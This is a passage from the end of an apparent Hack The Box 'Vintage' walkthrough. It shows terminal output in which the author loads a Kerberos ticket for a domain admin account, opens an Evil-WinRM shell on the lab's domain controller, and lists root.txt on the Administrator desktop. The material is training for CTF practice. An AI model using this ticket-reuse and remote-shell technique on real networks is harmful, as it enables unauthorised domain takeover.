[*] Saving ticket in L.Bianchi_adm@dc01.vintage.htb.ccache
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ export KRB5CCNAME=L.Bianchi_adm@dc01.vintage.htb.ccache 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Vintage]
└─$ evil-winrm -i dc01.vintage.htb -r vintage.htb          
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Bianchi_adm\Documents> 

We are in, and as a Domain Admin we can read root.txt from the Administrator's desktop:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---         7/25/2025   3:36 PM             34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> 
